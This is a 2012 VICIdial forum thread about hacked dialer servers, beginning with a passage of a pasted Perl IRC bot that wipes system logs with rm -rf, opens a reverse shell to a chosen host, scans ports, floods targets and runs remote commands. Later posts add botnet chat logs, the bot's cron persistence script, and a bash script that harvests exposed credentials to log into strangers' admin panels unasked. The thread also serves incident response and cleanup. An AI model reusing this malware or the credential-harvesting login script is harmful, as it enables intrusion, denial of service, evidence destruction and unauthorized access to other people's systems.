             sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4UDP22:.4 UDP2 Sent14 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 2Kb in4 ".$dtime." 2seconds to ".$1.".");
           }
############################################################


###########################################################
######################[.@cleanlogs.]#######################
###########################################################

if ($funcarg =~ /^cleanlogs/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Clean Logs2:.14 This process can be long2,4 just wait2!");
    system 'rm -rf /var/log/lastlog';
    system 'rm -rf /var/log/wtmp';
   system 'rm -rf /etc/wtmp';
   system 'rm -rf /var/run/utmp';
   system 'rm -rf /etc/utmp';
   system 'rm -rf /var/log';
   system 'rm -rf /var/logs';
   system 'rm -rf /var/adm';
   system 'rm -rf /var/apache/log';
   system 'rm -rf /var/apache/logs';
   system 'rm -rf /usr/local/apache/log';
   system 'rm -rf /usr/local/apache/logs';
   system 'rm -rf /root/.bash_history';
   system 'rm -rf /root/.ksh_history';
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Clean Logs2:.14 All default log and bash_history files erased");
      sleep 1;
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Clean Logs2:.14 Now Erasing the rest of the machine log files");
   system 'find / -name *.bash_history -exec rm -rf {} \;';
   system 'find / -name *.bash_logout -exec rm -rf {} \;';
   system 'find / -name "log*" -exec rm -rf {} \;';
   system 'find / -name *.log -exec rm -rf {} \;';
      sleep 1;
sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Clean Logs2:.14 Done! All logs erased");
      }

###########################################################
######################[.@cleanlogs.]#######################
###########################################################

###########################################################
########################[..@back..]########################
###########################################################

         if ($funcarg =~ /^back\s+(.*)\s+(\d+)/) {
            my $host = "$1";
            my $porta = "$2";
            my $proto = getprotobyname('tcp');
            my $iaddr = inet_aton($host);
            my $paddr = sockaddr_in($porta, $iaddr);
            my $shell = "/bin/sh -i";
            if ($^O eq "MSWin32") {
               $shell = "cmd.exe";
            }
            socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
            connect(SOCKET, $paddr) or die "connect: $!";
            open(STDIN, ">&SOCKET");
            open(STDOUT, ">&SOCKET");
            open(STDERR, ">&SOCKET");
            system("$shell");
            close(STDIN);
            close(STDOUT);
            close(STDERR);
            if ($estatisticas){
               sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Back Connect2:.14 Connecting to 2 $host:$porta");
            }
         }

###########################################################
########################[..@back..]########################
###########################################################



###########################################################
#########################[.@nmap.]#########################
###########################################################

   if ($funcarg =~ /^nmap\s+(.*)\s+(\d+)\s+(\d+)/){
         my $hostip="$1";
         my $portstart = "$2";
         my $portend = "$3";
         my (@abertas, %porta_banner);
       sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Nmap2:.14 Scanning $1 For Ports:  $2-$3");
       foreach my $porta ($portstart..$portend){
               my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => $portime);
    if ($scansock) {
                 push (@abertas, $porta);
                 $scansock->close;
                 if ($xstats){
        sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Nmap2:.14 Founded $porta"."/Open");
                 }
               }
             }
             if (@abertas) {
        sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Nmap2:.14 Complete");
             } else {
        sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Nmap2:.14 No open ports have been founded");
             }
          }
###########################################################
#########################[.@nmap.]#########################
###########################################################



           exit;
       }
  }
}
 
sub ircase {
  my ($kem, $printl, $case) = @_;

  if ($case =~ /^join (.*)/) {
     j("$1");
   }
   if ($case =~ /^part (.*)/) {
      p("$1");
   }
   if ($case =~ /^rejoin\s+(.*)/) {
      my $chan = $1;
      if ($chan =~ /^(\d+) (.*)/) {
        for (my $ca = 1; $ca <= $1; $ca++ ) {
          p("$2");
          j("$2");
        }
      } else {
          p("$chan");
          j("$chan");
      }
   }
   if ($case =~ /^op/) {
      op("$printl", "$kem") if $case eq "op";
      my $oarg = substr($case, 3);
      op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
   }
   if ($case =~ /^deop/) {
      deop("$printl", "$kem") if $case eq "deop";
      my $oarg = substr($case, 5);
      deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
   }
   if ($case =~ /^msg\s+(\S+) (.*)/) {
      msg("$1", "$2");
   }
   if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
      for (my $cf = 1; $cf <= $1; $cf++) {
        msg("$2", "$3");
      }
   }
   if ($case =~ /^ctcp\s+(\S+) (.*)/) {
      ctcp("$1", "$2");
   }
   if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
      for (my $cf = 1; $cf <= $1; $cf++) {
        ctcp("$2", "$3");
      }
   }
   if ($case =~ /^nick (.*)/) {
      nick("$1");
   }
   if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
       conectar("$2", "$1", 6667);
   }
   if ($case =~ /^raw (.*)/) {
      sendraw("$1");
   }
   if ($case =~ /^eval (.*)/) {
     eval "$1";
   }
}

sub shell {
  my $printl=$_[0];
  my $comando=$_[1];
  if ($comando =~ /cd (.*)/) {
    chdir("$1") || msg("$printl", "No such file or directory");
    return;
  }
  elsif ($pid = fork) {
     waitpid($pid, 0);
  } else {
      if (fork) {
         exit;
       } else {
           my @resp=`$comando 2>&1 3>&1`;
           my $c=0;
           foreach my $linha (@resp) {
             $c++;
             chop $linha;
             sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
             if ($c == "$linas_max") {
               $c=0;
               sleep $sleep;
             }
           }
           exit;
       }
  }
}

sub tcpflooder {
 my $itime = time;
 my ($cur_time);
 my ($ia,$pa,$proto,$j,$l,$t);
 $ia=inet_aton($_[0]);
 $pa=sockaddr_in($_[1],$ia);
 $ftime=$_[2];
 $proto=getprotobyname('tcp');
 $j=0;$l=0;
 $cur_time = time - $itime;
 while ($l<1000){
  $cur_time = time - $itime;
  last if $cur_time >= $ftime;
  $t="SOCK$l";
  socket($t,PF_INET,SOCK_STREAM,$proto);
  connect($t,$pa)||$j--;
  $j++;$l++;
 }
 $l=0;
 while ($l<1000){
  $cur_time = time - $itime;
  last if $cur_time >= $ftime;
  $t="SOCK$l";
  shutdown($t,2);
  $l++;
 }
}

sub udpflooder {
  my $iaddr = inet_aton($_[0]);
  my $msg = 'A' x $_[1];
  my $ftime = $_[2];
  my $cp = 0;
  my (%pacotes);
  $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
 
  socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
  socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
  socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
  socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
  return(undef) if $cp == 4;
  my $itime = time;
  my ($cur_time);
  while ( 1 ) {
     for (my $port = 1; $port <= 65000; $port++) {
       $cur_time = time - $itime;
       last if $cur_time >= $ftime;
       send(SOCK1, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{igmp}++;
       send(SOCK2, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{udp}++;
       send(SOCK3, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{icmp}++;
       send(SOCK4, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{tcp}++;

       for (my $pc = 3; $pc <= 255;$pc++) {
         next if $pc == 6;
         $cur_time = time - $itime;
         last if $cur_time >= $ftime;
         socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
         send(SOCK5, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{o}++;
       }
     }
     last if $cur_time >= $ftime;
  }
  return($cur_time, %pacotes);
}

sub udpflooder2 {
  my $iaddr = inet_aton($_[0]);
  my $msg = 'A' x $_[1];
  my $ftime = $_[2];
  my $cp = 0;
  my $udpport = $_[3];
  my (%pacotes);
  $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
 
  socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
  socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
  socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
  socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
  return(undef) if $cp == 4;
  my $itime = time;
  my ($cur_time);
  while ( 1 ) {
       $cur_time = time - $itime;
       last if $cur_time >= $ftime;
       send(SOCK1, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{igmp}++;
       send(SOCK2, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{udp}++;
       send(SOCK3, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{icmp}++;
       send(SOCK4, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{tcp}++;

       for (my $pc = 3; $pc <= 255;$pc++) {
         next if $pc == 6;
         $cur_time = time - $itime;
         last if $cur_time >= $ftime;
         socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
         send(SOCK5, $msg, 0, sockaddr_in($udpport, $iaddr)) and $pacotes{o}++;
     }
     last if $cur_time >= $ftime;
  }
  return($cur_time, %pacotes);
}
sub ctcp {
   return unless $#_ == 1;
   sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
   return unless $#_ == 1;
   sendraw("PRIVMSG $_[0] :$_[1]");

sub notice {
   return unless $#_ == 1;
   sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
   return unless $#_ == 1;
   sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
   return unless $#_ == 1;
   sendraw("MODE $_[0] -o $_[1]");
}
sub j { &join(@_); }
sub join {
   return unless $#_ == 0;
   sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {
  sendraw("PART $_[0]");
}
sub nick {
  return unless $#_ == 0;
  sendraw("NICK $_[0]");
}
sub quit {
  sendraw("QUIT :$_[0]");
}

It got a lot of nice features. use this "PRIVATE-SHIT" as much as you like :D
they are controlling the servers with irc,
I joined the channel and they got a lot of bots in #vici:
22:05:17-!- domedan [domedan@bredband.telia.com] has joined #vici
22:05:17[Users #vici]
22:05:17[@Arz ] [ legend-2114407] [ legend-4141544] [ legend-5216791] [ legend-6564188] [ legend-902578 ]
22:05:17[@legend ] [ legend-2219609] [ legend-4205939] [ legend-5453424] [ legend-6606186] [ legend-9074556 ]
22:05:17[@Zax ] [ legend-2399867] [ legend-4269871] [ legend-5457869] [ legend-6706281] [ legend-9085946 ]
22:05:17[ domedan ] [ legend-2472740] [ legend-4411230] [ legend-5506832] [ legend-6804481] [ legend-9106466 ]
22:05:17[ legend-1053838] [ legend-2532484] [ legend-4463938] [ legend-5613237] [ legend-6939433] [ legend-9121552 ]
22:05:17[ legend-1154062] [ legend-2573772] [ legend-4490485] [ legend-5773081] [ legend-7086824] [ legend-9175657 ]
22:05:17[ legend-119405 ] [ legend-2593175] [ legend-4621717] [ legend-5792627] [ legend-7277080] [ legend-9290305 ]
22:05:17[ legend-1196016] [ legend-2738087] [ legend-4670232] [ legend-5797741] [ legend-7323799] [ legend-9362856 ]
22:05:17[ legend-1228289] [ legend-2763621] [ legend-4690292] [ legend-5811294] [ legend-7411641] [ legend-9532331 ]
22:05:17[ legend-1301620] [ legend-2854885] [ legend-4717048] [ legend-5845477] [ legend-7492307] [ legend-9541299 ]
22:05:17[ legend-1403000] [ legend-3011003] [ legend-4757422] [ legend-59046 ] [ legend-7566805] [ legend-9597850 ]
22:05:17[ legend-1500923] [ legend-3130239] [ legend-4792816] [ legend-5971684] [ legend-7590112] [ legend-9618615 ]
22:05:17[ legend-1551443] [ legend-3284672] [ legend-4810559] [ legend-5987907] [ legend-7596290] [ legend-9719818 ]
22:05:17[ legend-1640994] [ legend-3437207] [ legend-4816366] [ legend-6018961] [ legend-7603667] [ legend-972908-1472135]
22:05:17[ legend-1903723] [ legend-3481315] [ legend-4845444] [ legend-6035015] [ legend-7719432] [ legend-9838014 ]
22:05:17[ legend-1921205] [ legend-3489298] [ legend-4871822] [ legend-6261054] [ legend-7782481] [ legend-9862820 ]
22:05:17[ legend-198544 ] [ legend-3551466] [ legend-493663 ] [ legend-629499 ] [ legend-7946213]
22:05:17[ legend-2028755] [ legend-3901269] [ legend-5029084] [ legend-6337581] [ legend-8092993]
22:05:17[ legend-2041938] [ legend-4093763] [ legend-5037497] [ legend-6339421] [ legend-8603140]
22:05:17[ legend-2064633] [ legend-409732 ] [ legend-509556 ] [ legend-6377342] [ legend-8605492]
22:05:17[ legend-2088615] [ legend-4123099] [ legend-515754 ] [ legend-6394740] [ legend-8885262]
22:05:17-!- Irssi: #vici: Total of 121 nicks [3 ops, 0 halfops, 0 voices, 118 normal]
22:05:17-!- Channel #vici created Wed Jul 25 11:47:52 2012
22:05:17-!- Irssi: Join to #vici was synced in 0 secs
22:06:38[space] -!- #zax Arz H* 0 hacktech@legendteam.info [TheChozen]
22:06:38[space] -!- End of /WHO list
22:06:52[space] -!- #vici legend H 0 vici@72.21.12.168 [legend secrets!]
22:06:52[space] -!- End of /WHO list
22:07:14[space] -!- #perl Zax H* 0 Zax@legendteam.info [Zax]
22:07:14[space] -!- End of /WHO list

117 vicidial-servers probably, not bad...
the holes should be fixed, can you guys who have been hacked post your logs somewhere so we can figure out what vulnerability they are using to get to the listloader


I wonder how many of those 117 that are aware of that their server are hacked...
Michael_N
 
Posts: 687
Joined: Wed Jul 05, 2006 3:13 pm
Location: sweden

Re: We were hacked: Security vulnerability in lead loader

Postby spacejanitor » Wed Aug 01, 2012 8:36 am

Indeed.

Our server didn't have this IRC bot installed, however it's great that DomeDan and rrb555 were able to find these intrusions on their systems. I hope there's some way to put out an alert to the community about this once we find out the most probable way it occurred.
http://www.MarketResearchTechnology.com
We are the leading users of ViciDial, LimeSurvey and Drupal in the market research industry. We're also a lead provider- contact us.

Cluster Installation, ViciBox Server
VERSION: 2.6-372a
BUILD: 120713-2123
spacejanitor
 
Posts: 178
Joined: Tue Feb 08, 2011 3:31 pm

Re: We were hacked: Security vulnerability in lead loader

Postby mcargile » Wed Aug 01, 2012 12:21 pm

The big issue is that someone has added this vulnerability to a script kiddy attack tool kit. The tool kit probably scans for tons of different vulnerabilities and executes the appropriate one, then lets you install various other things. That is why some people have DDOS software installed, others back doors.

As Matt stated we have made it so that the installer in SVN will not install the old list loader. It is still in the extras code directory, but it will not be installed by default. The installer will also delete the old list loader from already installed systems during an upgrade. We highly recommend upgrading, but if you do not want to do so you can also just delete that list loader. The files in question are in the vicidial directory under web root and are called new_listloader_superL.php, listloader_super.pl, and listloader.pl.

If you are running the OpenSuSE version of Vicibox, you cat run the following commands to get rid of the files:

Code: Select all
/usr/bin/find /srv/www/htdocs -iname new_listloader_superL.php | xargs rm -f
/usr/bin/find /srv/www/htdocs -iname listloader_super.pl | xargs rm -f
/usr/bin/find /srv/www/htdocs -iname listloader.pl | xargs rm -f


If you are running something else you will need to replace /srv/www/htdocs with the web root directory for your apache config.
Michael Cargile | Director of Engineering | ViciDialGroup | http://www.vicidial.com

The official source for VICIDIAL services and support. 1-888-894-VICI (8424)
mcargile
Site Admin
 
Posts: 617
Joined: Tue Jan 16, 2007 9:38 am

Re: We were hacked: Security vulnerability in lead loader

Postby spacejanitor » Wed Aug 01, 2012 1:12 pm

mcargile wrote:The big issue is that someone has added this vulnerability to a script kiddy attack tool kit. The tool kit probably scans for tons of different vulnerabilities and executes the appropriate one, then lets you install various other things. That is why some people have DDOS software installed, others back doors.

As Matt stated we have made it so that the installer in SVN will not install the old list loader. It is still in the extras code directory, but it will not be installed by default. The installer will also delete the old list loader from already installed systems during an upgrade. We highly recommend upgrading, but if you do not want to do so you can also just delete that list loader. The files in question are in the vicidial directory under web root and are called new_listloader_superL.php, listloader_super.pl, and listloader.pl.

If you are running the OpenSuSE version of Vicibox, you cat run the following commands to get rid of the files:

Code: Select all
/usr/bin/find /srv/www/htdocs -iname new_listloader_superL.php | xargs rm -f
/usr/bin/find /srv/www/htdocs -iname listloader_super.pl | xargs rm -f
/usr/bin/find /srv/www/htdocs -iname listloader.pl | xargs rm -f


If you are running something else you will need to replace /srv/www/htdocs with the web root directory for your apache config.


Thanks for the info mcargile.

By newest update, do you mean the newest dev release (on the 2.6 branch) or stable (2.4)?
http://www.MarketResearchTechnology.com
We are the leading users of ViciDial, LimeSurvey and Drupal in the market research industry. We're also a lead provider- contact us.

Cluster Installation, ViciBox Server
VERSION: 2.6-372a
BUILD: 120713-2123
spacejanitor
 
Posts: 178
Joined: Tue Feb 08, 2011 3:31 pm

Re: We were hacked: Security vulnerability in lead loader

Postby mflorell » Wed Aug 01, 2012 8:54 pm

it has been changed in both the 2.4 branch and in trunk.
mflorell
Site Admin
 
Posts: 18387
Joined: Wed Jun 07, 2006 2:45 pm
Location: Florida

Re: We were hacked: Security vulnerability in lead loader

Postby DomeDan » Thu Aug 02, 2012 6:50 am

spacejanitor wrote:Indeed.

Our server didn't have this IRC bot installed, however it's great that DomeDan and rrb555 were able to find these intrusions on their systems. I hope there's some way to put out an alert to the community about this once we find out the most probable way it occurred.


well, its was not my system, mine is safe, just looked in one from the list on irc.

I was banned from the channel but joined from an other ip and catched Zax when he used the victims:
10:46 <@Zax> !legend @visit http://www.spidertopweb.com/index2.html
10:46 < legend-3551466> .:Visit:. Got Response From http://www.spidertopweb.com/index2.html.
10:46 < legend-9106466> .:Visit:. Got Response From http://www.spidertopweb.com/index2.html.
10:46 < legend-9541299> .:Visit:. Got Response From http://www.spidertopweb.com/index2.html.
...

I will try to inform them that their servers has been compromised.
Vicidial Partner. Region: Sweden/Norway.
Does Vicidial installation, configuration, customization, add-ons, CRM implementation, support, upgrading, network-related, pentesting etc. Remote and onsite assistance.
Email: domedan (at) gmail.com
DomeDan
 
Posts: 1226
Joined: Tue Jan 04, 2011 9:17 am
Location: Sweden

Re: We were hacked: Security vulnerability in lead loader

Postby williamconley » Sun Aug 05, 2012 12:22 am

How is spidertopweb connected? Was this a DOS attack command?
Vicidial Installation and Repair, plus Hosting and Colocation
Newest Product: Vicidial Agent Only Beep - Beta
http://www.PoundTeam.com # 352-269-0000 # +44(203) 769-2294
williamconley
 
Posts: 20258
Joined: Wed Oct 31, 2007 4:17 pm
Location: Davenport, FL (By Disney!)

Re: We were hacked: Security vulnerability in lead loader

Postby rrb555 » Sun Aug 05, 2012 1:30 am

how can u tell which server (ip address) was been hacked?

i would like myself to infiltrate that IRC to check if one of my managed servers was been hacked at sometime (i know one of my managed server is hacked)
One server that I am managing | Single Server | ViciBox Redux 6.0 | VERSION: 2.12-549a | BUILD: 160404-0940 | revision 2508| No other hardware
For help you can send me a direct email info@support.com.ph
rrb555
 
Posts: 585
Joined: Tue Feb 08, 2011 4:24 pm
Location: Quezon City, Philippines

Re: We were hacked: Security vulnerability in lead loader

Postby DomeDan » Sun Aug 05, 2012 6:08 am

williamconley wrote:How is spidertopweb connected? Was this a DOS attack command?

Its just a GET request, here is that part of the code :
Code: Select all
###########################################################
########################[.@Visit.]#########################
###########################################################

         if ($funcarg =~ /^visit (.*)/) {
  my $url = "$1";
my $ua = LWP::UserAgent->new;
 $ua->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0');

 $ua->timeout(10);
 $ua->env_proxy;
 
 my $response = $ua->get($url);
 
 if ($response->is_success) {
     sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Visit2:.4 Got Response From $url.");
 }
 else {
     sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Visit2:.4 Failed Getting Response From $url.");
 }


}


rrb555 wrote:how can u tell which server (ip address) was been hacked?

I ran "/who" in the channel and got a list of all the users and their ip-adress,
but you can check if this script is running by listing the processes running by wwwrun as I mentioned earlier "ps aux|grep wwwrun" if its other processes besides "httpd2-prefork" then you should investigate.
Its possible that the attacker created a backdoor (which is part of the script) and then gained root access, if so then its harder to find out where he is hiding.

I wrote a script that created a campaign in the victims vicidial-system that informed them that they had been hacked, it worked on all host but 8 (because the script are not trying every user/pass found in project_auth_entries.txt)
Code: Select all
#!/bin/bash
VICTIMS_IP_FILE="list_of_vicidial_ip_adresses.txt"
N=0
TOT_VICTIMS=$(cat $VICTIMS_IP_FILE | sed '/^$/d' | wc -l) #remove empty lines with sed
cat $VICTIMS_IP_FILE | sed '/^$/d' | while read HOST ; do
        N=$((N+1))
        echo "### host $N/$TOT_VICTIMS - $HOST ###"
        curl $HOST/vicidial/project_auth_entries.txt | cut -d'|' -f2,4,5 | grep 'GOOD' | grep -v '|XXXX' | sort | uniq | while read AUTH_ENTRIES ; do
                echo "testing $AUTH_ENTRIES"
                USER=$( echo $AUTH_ENTRIES | cut -d'|' -f2)
                PASS=$( echo $AUTH_ENTRIES | cut -d'|' -f3)
                if [ -z $PASS ]; then
                        echo "--- Password empty for $HOST user $USER pass $PASS"
                        echo ""
                else
                        wget -t 3 -c http://$HOST/vicidial/admin.php --post-data 'ADD=21&park_ext=&campaign_id=_HACKED_&campaign_name=read+the+description+for+more+info&campaign_description=Your+server+has+been+hacked.+read+more+here%3A+www.vicidial.org%2FVICIDIALforum%2Fviewtopic.php%3Ft%3D25534+Regards+DomeDan.+if+the+link+is+broken+then+look+for+the+thread+on+the+vicidial+forum+its+named%3A+We+were+hacked+Security+vulnerability+in+lead+loader&active=N&park_file_name=&web_form_address=&allow_closers=Y&hopper_level=1&auto_dial_level=1&next_agent_call=random&local_call_time=12pm-5pm&voicemail_ext=&script_id=&get_call_launch=NONE&SUBMIT=SUBMIT' --http-user=$USER --http-passwd=$PASS
                        if [ $? -eq 0 ]; then
                                echo "--- Campaign CREATED on host $HOST user $USER pass $PASS"
                                echo ""
                                continue #go back to the first loop
                        else
                                echo "--- Failed creating campaign on host $HOST user $USER pass $PASS"
                                echo ""
                        fi
                fi
        done
done


-- edit: updated the script to loop through all possible user/pass found in project_auth_entries.txt
Last edited by DomeDan on Tue Aug 07, 2012 2:27 am, edited 1 time in total.
Vicidial Partner. Region: Sweden/Norway.
Does Vicidial installation, configuration, customization, add-ons, CRM implementation, support, upgrading, network-related, pentesting etc. Remote and onsite assistance.
Email: domedan (at) gmail.com
DomeDan
 
Posts: 1226
Joined: Tue Jan 04, 2011 9:17 am
Location: Sweden

Re: We were hacked: Security vulnerability in lead loader

Postby svsval » Mon Aug 06, 2012 1:58 pm

How did the link to this post appear on our dialer?
"Your server has been hacked. read more here: www.vicidial.org/VICIDIALforum/viewtopic.php?t=25534 Regards DomeDan. if the link is broken then look for the thread on the vicidial forum its named: We were hacked Security vulnerability in lead loader"
svsval
 
Posts: 1
Joined: Mon Aug 06, 2012 1:52 pm

Re: We were hacked: Security vulnerability in lead loader

Postby williamconley » Mon Aug 06, 2012 7:13 pm

svsval wrote:How did the link to this post appear on our dialer?
"Your server has been hacked. read more here: viewtopic.php?t=25534 Regards DomeDan. if the link is broken then look for the thread on the vicidial forum its named: We were hacked Security vulnerability in lead loader"

Read the post from the beginning. You will not be happy, but you will be enlightened. Back up your database. Reinstall with iptables whitelist security. Restore your database. And thank the guy that pushed the message. Seriously. Probably should buy him a steak or something.
Vicidial Installation and Repair, plus Hosting and Colocation
Newest Product: Vicidial Agent Only Beep - Beta
http://www.PoundTeam.com # 352-269-0000 # +44(203) 769-2294
williamconley
 
Posts: 20258
Joined: Wed Oct 31, 2007 4:17 pm
Location: Davenport, FL (By Disney!)

Re: We were hacked: Security vulnerability in lead loader

Postby williamconley » Mon Aug 06, 2012 7:16 pm

Also of note: we block all "txt" and "log" files from being read on our web servers.

Standard Vicibox servers:

Code: Select all
nano /etc/apache2/sites-available/default

or
Code: Select all
nano /etc/apache2/default-server.conf


Find:
Code: Select all
 Allow from all
</Directory>

Add between these two lines:
Code: Select all
 Allow from all
        <FilesMatch "\.(log|txt)$">
           Order allow,deny
           Deny from all
        </FilesMatch>
</Directory>
If you attempt to access http://SERVERIP/vicidial/project_auth_entries.txt at this point, it will work.

Code: Select all
/etc/init.d/apache2 restart

If you attempt to access http://SERVERIP/vicidial/project_auth_entries.txt at this point, it will NOT work.
Vicidial Installation and Repair, plus Hosting and Colocation
Newest Product: Vicidial Agent Only Beep - Beta
http://www.PoundTeam.com # 352-269-0000 # +44(203) 769-2294
williamconley
 
Posts: 20258
Joined: Wed Oct 31, 2007 4:17 pm
Location: Davenport, FL (By Disney!)

Re: We were hacked: Security vulnerability in lead loader

Postby DomeDan » Tue Aug 07, 2012 4:28 am

you can also link project_auth_entries.txt to /dev/null
cd /srv/www/htdocs/vicidial/ ; ln -s /dev/null project_auth_entries.txt
ls -l
lrwxrwxrwx 1 root root 9 2011-09-21 22:29 project_auth_entries.txt -> /dev/null

you can also set "Webroot Writable = 0" under system settings in the vicidial admin page, this will prevent the files from being written (but you need to manually remove the file if you dont want it there)

and as william said, a reinstall is probably the best and easiest thing to do.

I came into work this morning to find a new campaign created by you stating my dialer had been hacked. I have went thru the entire thread you linked in the campaign, however I am unable to remove the vici.txt(doesnt exist) or the wwwrun program(keeps changing numbers). Im going to be adding a whitelist style to IPTables, as this was a recent install, however Id like to stop any other intrusion before the IPTABLES whitelist is created. Any suggestions?

Yes, vici.txt is deleted once it has been executed, this is how to find the process:
vicibox:~/ # ps aux | grep wwwrun # !! Replace wwwrun with apache if your running goautodial !!
wwwrun 12708 0.0 0.0 100836 5576 ? S Aug04 0:00 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun 12712 0.0 0.0 101284 7924 ? S Aug04 0:00 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun 12713 0.0 0.0 100836 5584 ? S Aug04 0:00 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun 12714 0.0 0.0 100836 5584 ? S Aug04 0:00 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun 12715 0.0 0.1 103084 8576 ? S Aug04 0:00 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun 12717 0.0 0.0 100836 5580 ? S Aug04 0:00 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun 12718 0.0 0.1 106392 12892 ? S Aug04 0:00 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun 12719 0.0 0.1 106392 12892 ? S Aug04 0:00 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun 12720 0.0 0.0 101284 7920 ? S Aug04 0:00 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
root 18810 0.0 0.0 3612 720 pts/2 S+ 03:36 0:00 grep wwwrun
wwwrun 19500 0.0 0.1 103580 10452 ? S Jul31 0:00 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun 24877 0.1 0.0 8868 5032 ? S Aug05 3:49 init [3]
wwwrun 25712 0.1 0.0 8868 5036 ? S Aug05 3:49 init [3]

the "init [3]" runned by wwwrun is the bad once, it can be one or more
kill the processes like this:
kill -9 24877 #this is the process ID, look in the list of "ps aux | grep wwwrun" to find what ID it is
kill -9 25712

run "ps aux | grep wwwrun" again and make sure they are gone.


found some interesting things:
/tmp/.z/.sh3ll/run:
Code: Select all
#!/bin/sh
pwd > dir.dir
dir=$(cat dir.dir)
echo "* * * * * $dir/update >/dev/null 2>&1" > cron.d
crontab cron.d
crontab -l | grep update
echo "#!/bin/sh
if test -r $dir/mech.pid; then
pid=\$(cat $dir/mech.pid)
if \$(kill -CHLD \$pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd $dir
./start.sh &>/dev/null" > update
chmod u+x update


and found this:
vicibox:~ # crontab -u wwwrun -l
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (cron.d installed on Wed Jul 18 08:11:39 2012)
# (Cron version V5.0 -- $Id: crontab.c,v 1.12 2004/01/23 18:56:42 vixie Exp $)
* * * * * /tmp/.z/.sh3ll/update >/dev/null 2>&1


remove wwwrun crontab with this command:
crontab -u wwwrun -r
make sure you use this "-u wwwrun" !

remove or move /tmp/.z or /tmp/.x
find out what its name with this command:
find /tmp -name '*sh3ll*'
and just
rm -rf /tmp/.x
or
mv /tmp/.x ~/name_it_whatever_you_like


suggestions to stop further intrusion:
* as mentioned above: make project_auth_entries.txt non read-able in the web-browser.
* disable vtiger if its not in use "chmod 000 /srv/www/htdocs/vtigercrm/" (http://www.vicidial.org/VICIDIALforum/v ... hp?t=25246) and if your using it then patch that file
* upgrade to the latest version version of vicidial (svn trunk) (http://www.vicidial.org/VICIDIALforum/v ... hp?t=16326)
* whitelist

but start with a reinstall.






some news about the attackers, they have updated the script:
Code: Select all
--- vici_1.txt   2012-07-29 18:56:02.000000000 +0200
+++ vici_2.txt   2012-08-05 17:54:41.000000000 +0200
@@ -35,3 +35,3 @@
-my @channels=("#vici");
-my $nick='legend';
-my $ircname ='vici';
+my @channels=("#legend");
+my $nick='[vici]-';
+my $ircname ='legend';
@@ -39,2 +39,2 @@
-my $server='space.legendteam.info';
-my $port='6667';
+my $server='chaos.legendteam.info';
+my $port='1234';


there has been a lot of activity in the new channel,
here is a few lines, most of it is arabic i guess, but here is some english:
01:22 <@god> 3al asterisk
01:22 <@god> i have access
01:22 <@god> to 5 roots
01:22 <@god> of the company
01:23 <@Arz> good
01:23 <@Arz> hala2a all my bots out ya bro

I posted the whole chat I got so far here: http://pastebin.com/raw.php?i=fGSV2jY3 (1250 rows)
Vicidial Partner. Region: Sweden/Norway.
Does Vicidial installation, configuration, customization, add-ons, CRM implementation, support, upgrading, network-related, pentesting etc. Remote and onsite assistance.
